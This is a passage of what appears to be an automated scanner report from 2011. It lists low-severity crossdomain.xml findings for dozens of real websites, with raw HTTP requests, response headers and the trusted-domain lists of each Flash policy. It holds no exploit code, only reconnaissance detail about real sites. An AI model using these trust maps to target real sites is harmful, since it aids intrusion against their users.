to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.cerosdevelopment.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.lightmakerorlando.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.cerosstaging.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.sears.fluid.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.fluid.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.craftsman.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.allurent.net" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.productiveedge.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.zemoga.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.kenmore.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.kmart.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="*.searstestsite.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.catapultclients.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.catapultmarketing.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.colossal-squid.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.digitalfolio.com" to-ports="*" secure="true" /> ...[SNIP]... <allow-access-from domain="*.sears.realartusa.com" to-ports="*" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kodakgallery |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kodakgallery.com |
HTTP/1.1 200 OK Set-Cookie: JSESSIONID=25A692A68 Set-Cookie: sourceId=500019816903; Domain=kodakgallery.com; Expires=Mon, 02-May-2011 13:33:57 GMT; Path=/ Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: DYN_EMAIL=anon_mem11 Set-Cookie: ft_80002=editACopyTest; Domain=kodakgallery.com; Expires=Sun, 01-Apr-2012 13:33:57 GMT; Path=/ Set-Cookie: abTest=ft_80002-; Domain=kodakgallery.com; Expires=Sun, 01-Apr-2012 13:33:57 GMT; Path=/ ETag: W/"707-1301619341000" Last-Modified: Fri, 01 Apr 2011 00:55:41 GMT Content-Type: text/xml Content-Length: 707 Date: Sat, 02 Apr 2011 13:33:57 GMT Connection: close Server: ecom604 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.ofoto.com"/> ...[SNIP]... <allow-access-from domain="*.kodak.com"/> ...[SNIP]... <allow-access-from domain="*.kodakgallery.com"/> ...[SNIP]... <allow-access-from domain="*.hippiepix.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kraftrecipes |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.kraftrecipes.com |
HTTP/1.0 200 OK Content-Length: 758 Content-Type: text/xml Content-Location: http://www.kraftrecipes Last-Modified: Mon, 07 Mar 2011 20:34:46 GMT Accept-Ranges: bytes ETag: "b3afc3187ddcb1:5897" Server: Microsoft-IIS/6.0 MicrosoftSharePointT X-Powered-By: ASP.NET Vary: Accept-Encoding Date: Sat, 02 Apr 2011 13:23:47 GMT Connection: close Set-Cookie: BIGipServerwww.kraft <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.kraftfoods.com" /> <allow-access-from domain="*.greypoupon.com" /> <allow-access-from domain="*.atasteofgreypoupon.com" /> <allow-access-from domain="*.clientstaging.net" /> <allow-access-from domain="*.gigyahosting1.com" /> <allow-access-from domain="*.amazonaws.com" /> <allow-access-from domain="*.doubleclick.com" /> <allow-access-from domain="*.doubleclick.net" /> <allow-access-from domain="*.chumby.com" /> <allow-access-from domain="*.akqa.com" /> <allow-access-from domain="*.comidakraft.com" /> <allow-access-from domain="*.akufen.ca"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.krillion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.krillion.com |
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: application/xml Date: Sat, 02 Apr 2011 13:59:23 GMT ETag: "a04a-60-49201c515b780" Last-Modified: Thu, 07 Oct 2010 07:23:26 GMT Server: Apache/2.2 Vary: Accept-Encoding Content-Length: 96 Connection: Close <cross-domain-policy> <allow-access-from domain="*.krillion.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.last.fm |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.last.fm |
HTTP/1.0 200 OK Date: Sat, 02 Apr 2011 12:14:03 GMT Server: Apache/1.3.39 (Unix) X-Proxy-Fix-Up: headers fixed up Last-Modified: Wed, 10 Dec 2008 15:09:07 GMT ETag: "32ab-148-493fdb93" Accept-Ranges: bytes Content-Length: 328 Content-Type: application/xml Age: 4738 X-Cache: HIT from cache4.bra.last.fm X-Cache-Lookup: HIT from cache4.bra.last.fm:8081 Via: 1.0 cache4.bra.last.fm:8081 (squid/2.7.STABLE7) Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.last.fm" secure="false" /> ...[SNIP]... <allow-access-from domain="*.audioscrobbler.com"/> <allow-access-from domain="87.117.229.54" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.latimes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.latimes.com |
HTTP/1.0 200 OK Server: Sun-ONE-Web-Server/6.1 Content-Length: 438 Content-Type: text/xml P3P: policyref="http://www Last-Modified: Thu, 03 Mar 2011 02:18:58 GMT ETag: "1b6-4d6efa92" Accept-Ranges: bytes Date: Sat, 02 Apr 2011 13:23:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.wp.com"/> <allow-access-from domain="s-ssl.wordpress.com"/> <allow-access-from domain="latimesphoto.wordpress <allow-access-from domain="framework.latimes.com"/> <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.legacy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.legacy.com |
HTTP/1.1 200 OK Content-Length: 207 Content-Type: text/xml Last-Modified: Thu, 20 Sep 2007 15:10:00 GMT Accept-Ranges: bytes ETag: "054d5098fbc71:0" Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 12:43:20 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.lego.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.lego.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 429 Content-Type: text/xml Last-Modified: Tue, 28 Sep 2010 12:54:18 GMT Accept-Ranges: bytes ETag: "92a75b43c5fcb1:0" Server: Microsoft-IIS/6.0 Date: Sat, 02 Apr 2011 13:34:44 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.lego.com" /> <allow-access-from domain="pserver.mii.instacontent <allow-access-from domain="a248.e.akamai.net"/> <allow-access-from domain="a248.e.akamai-staging.net"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.livecams.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.livecams.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:57:10 GMT Server: Apache Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT Accept-Ranges: bytes Content-Length: 218 P3P: policyref="http://www Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.naiadsystems.com" /> </cros ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.livenation.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.livenation.com |
HTTP/1.0 200 OK Server: Apache X-DC-Name: 1 Last-Modified: Mon, 14 Mar 2011 17:32:52 GMT ETag: "4c3-b383d900" Accept-Ranges: bytes Content-Length: 1219 Content-Type: text/xml Date: Sat, 02 Apr 2011 13:56:47 GMT Connection: close Set-Cookie: SID=-QmTwYpmUo1j2xXa Set-Cookie: BID=UF2kDjV9k92gQ Set-Cookie: CMPS=IUzxsu9HiFZ <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.ticketmaster.co.nz" /> <allow-access-from domain="*.ticketmaster.co.uk" /> <allow-access-from domain="*.ticketmaster.com" /> <allow-access-from domain="*.ticketmaster.com.au" /> <allow-access-from domain="*.ticketmaster.com.mx" /> <allow-access-from domain="*.ticketmaster.de" /> <allow-access-from domain="*.ticketmaster.ie" /> <allow-access-from domain="*.ticketmaster.es" /> <allow-access-from domain="*.ticketmaster.eu" /> <allow-access-from domain="*.ticketmaster.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tmcs" secure="false" /> ...[SNIP]... <allow-access-from domain="ticketmaster.co.nz" /> <allow-access-from domain="ticketmaster.co.uk" /> <allow-access-from domain="ticketmaster.com" /> <allow-access-from domain="ticketmaster.com.au" /> <allow-access-from domain="ticketmaster.com.mx" /> <allow-access-from domain="ticketmaster.de" /> <allow-access-from domain="ticketmaster.ie" /> <allow-access-from domain="ticketmaster.es" /> <allow-access-from domain="ticketmaster.eu" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.llbean.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.llbean.com |
HTTP/1.0 200 OK Last-Modified: Fri, 25 Mar 2011 01:41:07 GMT ETag: "14e9aa7-d8-b00bd2c0" Accept-Ranges: bytes Cache-Control: max-age=3600 Expires: Sat, 02 Apr 2011 14:34:27 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELa TRo IND PHY ONL UNI PUR FIN COM NAV DEM STA", policyref="/w3c/p3p.xml" Content-Type: text/xml Content-Length: 216 Date: Sat, 02 Apr 2011 13:34:27 GMT Connection: close Set-Cookie: TS6e35ec=1ebe56f9a77 <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.llbean.com" /> </cross- ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.macys.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.macys.com |
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Mon, 28 Feb 2011 22:47:10 GMT ETag: "9f2da-23c-75c2d780" Content-Type: text/xml Date: Sat, 02 Apr 2011 13:26:32 GMT Content-Length: 572 Connection: close Set-Cookie: stop_mobi=yes; expires=Sat, 02-Apr-2011 13:56:32 GMT; path=/; domain=.macys.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.macys.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.fds.com" secure="false"/> ...[SNIP]... <allow-access-from domain="macys.com" secure="false"/> ...[SNIP]... <allow-access-from domain="fds.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.fds.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.*.macys.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.serving-sys.com" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mail.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mail.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:43:28 GMT Server: Apache Last-Modified: Tue, 08 Mar 2011 16:06:10 GMT Accept-Ranges: bytes Content-Length: 140 Vary: Accept-Encoding Connection: close Content-Type: application/xml <cross-domain-policy> <allow-access-from domain="*.mail.com"/> <allow-access-from domain="*.mailcdn.com"/> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.marykay.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.marykay.com |
HTTP/1.1 200 OK Content-Length: 142 Content-Type: text/xml Last-Modified: Thu, 10 Mar 2011 18:13:17 GMT Accept-Ranges: bytes ETag: "62ae35d44edfcb1:a50fa" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: TLTHID=9E10431F41760 Set-Cookie: TLTSID=9E10431F41760 HostName: WDDCEPPWS103 Date: Sat, 02 Apr 2011 14:18:37 GMT Connection: close Set-Cookie: www.marykay.com=554376364 <cross-domain-policy> <allow-access-from domain="*.ai-media.com" /> <allow-access-from domain="*.marykay.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mastercard.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mastercard.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:06:27 GMT Server: Apache Last-Modified: Fri, 25 Feb 2011 20:37:56 GMT ETag: "50b-4e101100" Accept-Ranges: bytes Content-Length: 1291 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/xml Set-Cookie: NSC_xxx.nbtufsdbse.dpn <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain- ...[SNIP]... <allow-access-from domain="*.mastercard.us" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mastercard.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mastercardbusiness.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.priceless.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mastercard.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mastercard.org" secure="false"/> ...[SNIP]... <allow-access-from domain="*.chasepayeedirectory.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.chasebillmanager.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.loyaltygateway.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.mastercardeasysavings ...[SNIP]... <allow-access-from domain="*.mastercardbusiness ...[SNIP]... <allow-access-from domain="*.mastercardacquirernews ...[SNIP]... <allow-access-from domain="*.ridenynj.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.ridenewyorknewjersey ...[SNIP]... <allow-access-from domain="*.mastercard.co.uk" secure="false"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.match.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.match.com |
HTTP/1.1 200 OK Content-Length: 529 Content-Type: text/xml Content-Location: http://www.match.com Last-Modified: Tue, 28 Dec 2010 22:07:35 GMT Accept-Ranges: bytes ETag: "7f249a2dba6cb1:539" Server: Microsoft-IIS/6.0 P3p: CP="NOI DSP COR NID CUR OUR NOR" X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 12:38:09 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.match.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.match.corp" secure="true" /> ...[SNIP]... <allow-access-from domain="*.msn.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.s-msn.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.aolcdn.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.bing.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mcafee.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mcafee.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 01 Feb 2011 12:17:33 GMT Accept-Ranges: bytes ETag: "80ecda0ac2cb1:0" Server: Microsoft-IIS/7.0 SN: SJV1 Date: Sat, 02 Apr 2011 13:43:27 GMT Cache-Control: no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT x-cdn: Served by WebAcceleration Connection: close ...<?xml version="1.0" encoding="utf-8" ?> <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*.mcafee.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.brightcove.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.google-analytics.com" secure="true" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.medcohealth |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.medcohealth.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:56:13 GMT Last-Modified: Fri, 29 May 2009 19:11:09 GMT Accept-Ranges: bytes Content-Length: 288 Connection: close Content-Type: application/xml Set-Cookie: TS2d8041=c0f19c17adf <cross-domain-policy xmlns:xsi="http://www.w3 xsi:noNamespaceSchem <allow-access-from domain="*.brightcove.com"/> <allow-access-from domain="*.google-analytics.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.medscape.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.medscape.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:15 GMT Server: Apache Last-Modified: Thu, 15 Oct 2009 13:24:15 GMT ETag: "159eee-1ae-475f9321e5dc0 Accept-Ranges: bytes Content-Length: 430 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: application/xml Set-Cookie: NSC_xxx-xfc.qsg.qiy1:80 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.medscape.com" /> <allow-access-from domain="*.medsite.com" /> <allow-access-from domain="dme.cybersessions.com" /> <allow-access-from domain="*.emedicine.com" /> <allow-access-from domain="*.digitalrhino.net" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.meebo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.meebo.com |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 02 Apr 2011 13:36:10 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 303 Last-Modified: Sat, 12 Mar 2011 00:10:17 GMT Connection: close Accept-Ranges: bytes <cross-domain-policy> <allow-access-from domain="www.meebo.com"/> <allow-access-from domain="*.meebo.com"/> <allow-access-from domain="meebo.com"/> <allow-access-from domain="*.meebome.com"/> <allow-access-from domain="www.meebome.com"/> <allow-access-from domain="meebome.com"/> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.meetlocals.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.meetlocals.com |
HTTP/1.1 200 OK Server: Zeus/4.3 Date: Sat, 02 Apr 2011 13:26:39 GMT Connection: close Content-Type: text/xml Content-Length: 220 Accept-Ranges: bytes Last-Modified: Tue, 01 Sep 2009 16:40:36 GMT <cross-domain-policy xsi:noNamespaceSchem <allow-access-from domain="dev.meetlocals.com"/> <allow-access-from domain="*.meetlocals.com"/> </ ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.meetup.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.meetup.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:19 GMT Server: Apache-Coyote/1.1 ETag: W/"297-1296133256000" Last-Modified: Thu, 27 Jan 2011 13:00:56 GMT Content-Type: text/xml Content-Length: 297 Vary: Accept-Encoding,User Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.meetupstatic.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.meetupstatic.com" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.megaupload.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.megaupload.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:37:26 GMT Server: Apache Last-Modified: Sun, 28 Nov 2010 08:25:31 GMT ETag: "275" Accept-Ranges: bytes Content-Length: 629 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.megarotic.com" /> <allow-access-from domain="*.sexuploader.com" /> <allow-access-from domain="*.megaupload.com" /> <allow-access-from domain="*.megarotic.com" /> <allow-access-from domain="*.megaupload.com" /> <allow-access-from domain="*.megavideo.com" /> <allow-access-from domain="*.megaflirt.com" /> <allow-access-from domain="*.megaporn.com" /> <allow-access-from domain="*.megaking.com" /> <allow-access-from domain="*.megagogo.com" /> <allow-access-from domain="*.megahelp.com" /> <allow-access-from domain="*.megabest.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.megavideo.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.megavideo.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:42:18 GMT Server: Apache Last-Modified: Mon, 29 Nov 2010 03:41:12 GMT ETag: "23ba86c-2a2-49628d7 Accept-Ranges: bytes Content-Length: 674 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.megarotic.com" /> <allow-access-from domain="*.sexuploader.com" /> <allow-access-from domain="*.megaupload.com" /> <allow-access-from domain="*.megarotic.com" /> <allow-access-from domain="*.megaupload.com" /> <allow-access-from domain="*.megavideo.com" /> <allow-access-from domain="*.megaflirt.com" /> <allow-access-from domain="*.megaporn.com" /> <allow-access-from domain="*.megaking.com" /> <allow-access-from domain="*.megagogo.com" /> <allow-access-from domain="*.megahelp.com" /> <allow-access-from domain="*.megabest.com" /> <allow-access-from domain="*.megabox.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.merck.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.merck.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:59:16 GMT Server: Apache Set-Cookie: unique_visitor=173.193 Last-Modified: Sun, 07 Mar 2010 22:22:21 GMT ETag: "678c00-d7-61d24140" Accept-Ranges: bytes Content-Length: 215 P3P: policyref="http://www Connection: close Content-Type: application/xml Set-Cookie: BIGipServerwww.merck.com <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*. akamai.net" /> </cross- ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.merriam |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.merriam-webster.com |
HTTP/1.1 200 OK Server: Apache/2.2.14 (Ubuntu) Last-Modified: Sat, 21 Aug 2010 17:55:02 GMT ETag: "33c24f-147-48e591d522980 Content-Type: application/xml Content-Length: 327 Date: Sat, 02 Apr 2011 12:44:02 GMT X-Varnish: 589058149 Age: 0 Via: 1.1 varnish Connection: close X-Cache: MISS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="vindicoasset.edgesuite <allow-access-from domain="*.m-w.com" /> <allow-access-from domain="*.merriam-webster.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.military.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.military.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:28:32 GMT Server: Apache Cache-Control: max-age=6000 Expires: Sat, 02 Apr 2011 15:08:32 GMT Last-Modified: Thu, 08 Nov 2007 18:12:47 GMT ETag: "9c46-79-4733519f" Accept-Ranges: bytes Content-Length: 121 Content-Type: text/xml Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*.military.com" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mindjolt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mindjolt.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:44:44 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Mon, 04 Jan 2010 21:49:49 GMT ETag: "360144-1df-47c5db34fd940 Accept-Ranges: bytes Content-Length: 479 Vary: Accept-Encoding,User Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="static.mindjolt.com" /> <allow-access-from domain="cache.mindjolt.com" /> <allow-access-from domain="flash.mindjolt.com" /> <allow-access-from domain="cdn.mindjolt.com" /> <allow-access-from domain="*.mindjolt.com" /> <allow-access-from domain="devflash.mindjolt.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.miniclip.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.miniclip.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) DAV/2 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 Last-Modified: Fri, 04 Mar 2011 15:14:10 GMT ETag: "644c-683-49da999127480" Content-Type: text/xml X-Cacheable: YES Content-Length: 1667 Date: Sat, 02 Apr 2011 13:25:39 GMT X-Varnish: 420130408 420121234 Age: 484 Via: 1.1 varnish Connection: close X-Served-By: webftl77 X-Cache: HIT X-Cache-Hits: 16 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="66.165.172.181" /> <allow-access-from domain="85.112.4.227" /> <allow-access-from domain="76.74.147.153" /> <allow-access-from domain="76.74.147.154" /> <allow-access-from domain="77.73.32.96" /> <allow-access-from domain="77.73.32.120" /> <allow-access-from domain="77.73.36.99" /> <allow-access-from domain="miniclip.com" /> <allow-access-from domain="*.miniclip.com" /> <allow-access-from domain="*.icq.com" /> <allow-access-from domain="ads.miniclip.com" /> <allow-access-from domain="cms.miniclip.com" /> <allow-access-from domain="devcms.miniclip.com" /> <allow-access-from domain="bakery.devcms.miniclip <allow-access-from domain="developers.miniclip.com" /> <allow-access-from domain="limao.miniclip.com" /> <allow-access-from domain="www.sketchstar.com" /> <allow-access-from domain="gamebakers.com" /> ...[SNIP]... <allow-access-from domain="*.247realmedia.com" /> <allow-access-from domain="facebook.com" /> <allow-access-from domain="*.facebook.com" /> <allow-access-from domain="apps.facebook.com" /> <allow-access-from domain="facebook.beta.cms <allow-access-from domain="facebook.beta.devcms <allow-access-from domain="chat.kongregate.com" /> <allow-access-from domain="www.newgrounds.com" /> <allow-access-from domain="uploads.ungrounded.net" /> <allow-access-from domain="www.basoft.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.miracleworkers |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.miracleworkers.com |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT Accept-Ranges: bytes ETag: "d62146eddfb7cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET X-PBY: BEAR37 Date: Sat, 02 Apr 2011 13:54:04 GMT Connection: close Content-Length: 842 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.careerbuilder.com" /> <allow-access-from domain="img.icbdr.com" /> <allow-access-from domain="img.cbdr.com" /> <allow-access-from domain="*.icbdr.com" /> <allow-access-from domain="*.cbdr.com" /> <allow-access-from domain="*.jobbguiden.se" /> <allow-access-from domain="*.jobbingmall.nl" /> <allow-access-from domain="*.careerbuilder.de" /> <allow-access-from domain="*.careerbuilder.no" /> <allow-access-from domain="*.careerbuilder.ch" /> <allow-access-from domain="*.kariera.gr" /> <allow-access-from domain="*.careerbuilder.gr" /> <allow-access-from domain="*.careerbuilder.fr" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.mocospace.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.mocospace.com |
HTTP/1.0 200 OK Server: Resin/4.0.6 ETag: "HMreoUE2dEZ" Last-Modified: Wed, 30 Mar 2011 14:01:53 GMT Accept-Ranges: bytes Cache-Control: private Content-Type: text/xml; charset=utf-8 Content-Length: 702 Date: Sat, 02 Apr 2011 13:53:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*.edgesuite.net" /> <allow-access-from domain="img.mocospace.com <allow-access-from domain="*.mocospace.com" /> <allow-access-from domain="mocospace.com" /> <allow-access-from domain="*.sixthgearstudios.com" /> <allow-access-from domain="sixthgearstudios.com" /> <allow-access-from domain="*.buddylube.com" /> <allow-access-from domain="buddylube.com" /> ...[SNIP]... |
